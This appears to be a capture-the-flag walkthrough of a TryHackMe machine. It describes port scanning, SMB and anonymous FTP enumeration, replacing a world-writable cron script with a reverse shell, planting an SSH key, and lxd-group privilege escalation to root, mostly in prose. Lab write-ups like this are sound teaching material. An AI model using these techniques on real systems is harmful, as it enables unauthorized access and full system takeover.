This challenge was an interesting one since I really enjoyed it!
Now, let’s get to work and see how we can get all the answers needed for this challenge.
- Enumerate the machine. How many ports are open?
We will perform a scan, using nmap, in order to find out more about this server.
nmap -A 10.10.221.228
As we can see from the above screenshot, there are 4 open ports.
2. What service is running on port 21?
This information also is available in the previously performed scan, we can easily see that it is FTP service.
3. What service is running on ports 139 and 445?
From the same output, we can see that we have on ports 139 and 445 the samba (smb) service running.
4. There’s a share on the user’s computer. What’s it called?
For this question, we need to perform an enumeration of samba drives of the server. In order to do these, we will use smbclient tool.
As you can see, there were found some drives, one of them being a directory of interested, more specific, the share directory for pics.
Well, now we are getting into the real work for this. Let’s try to use what we discovered at point 4 and see if we can find anything interesting for us after connecting to the drive.
Well, well, it looks like we found something. As you can see, there are 2 pictures over there. Let’s download them and see if they can provide us any useful information.
I attempted to get some info about the photos using steghide, maybe they had something hidden inside them, it asked for a passphrase. When I tried with blank password, it didn’t let me scan for info. Maybe we will find something useful later. I also tried to get something with exiftool but nothing interesting appeared.
Anyway, if we go back to the port scan screenshot, we can see something interesting about the FTP service, it allows anonymous login. Let’s connect and see what we have there.
After logging in with the anonymous user, we see that there is a folder called scripts. If we go further, we can find a script, a log file and a to do list. Let’s get all 3 files and see what they contain and if we can use somehow the information they provide.
The to_do.txt file looks like a note, where someone set a reminder to disable the anonymous login on the ftp, because it’s not safe. Well, it really isn’t! Next, the script seems to be a cleanup script that outputs some info in the log file we found on the ftp. Judging by the number of lines we see as output in the log file, we can assume that the script runs pretty often. Also, have a look at the rights of the cleanup script, they are more permissive than they should. I decided to take advantage of this and to modify the content of the script and change it with a reverse shell, in order to get a shell on the target machine.
I edited the clean.sh script, added the syntax for reverse shell, set the port to 4444 and typed the IP I have from TryHackMe VPN.
After this, I made the script executable, connected again to the ftp server and uploaded it there. Before this, I started a netcat listener on the port I put in the script, 4444.
After waiting a while, I got a bash shell on the victim’s machine.
Now, I could go directly to the flag, but I tried to somehow spawn a shell, in order to be easier to proceed with the command line. I saw that python is installed there but then I had a better idea. I checked the .ssh directory for namelessone user and I saw that it doesn’t exist. So I decided to generate a pair or public-private keys, save the private one locally and then use it to connect directly.
After generating the pair, I copied the content of the private one locally into a file, changed the permissions of that file to 600 (otherwise it won’t work), added remotely the content of id_rsa into authorized_keys in .ssh directory and attempted to connect as namelessone. And I succeeded. Voila!
Now, let’s find the flag for user.txt.
Here it was a tough one. Even though I figured what was the vulnerability, I needed some help from Google to exploit it. I encountered this exploit in other challenges too, but not being into it too much, I had to get some help.
Initially, I wanted to check if the user has any sudo rights, but since I didn’t know the password, I couldn’t. So I checked the information about “namelessone”. It looked like it was part of the group lxd. And that means that we can exploit this.
I had already downloaded Alpine for this exploit and I just had to transfer it to the target machine. I chose to do it via sftp, even though it can be downloaded directly from the victim’s PC.
After deploying Alpine, I created a lxd container with security privileges and mounted the root directory on /mnt. After this, started a shell and here we are, having root access. From here, we just have to reveal the root flag. Since we mounted / on /mnt, the flag is in /mnt/root/root.txt
I hope you enjoyed this walkthrough!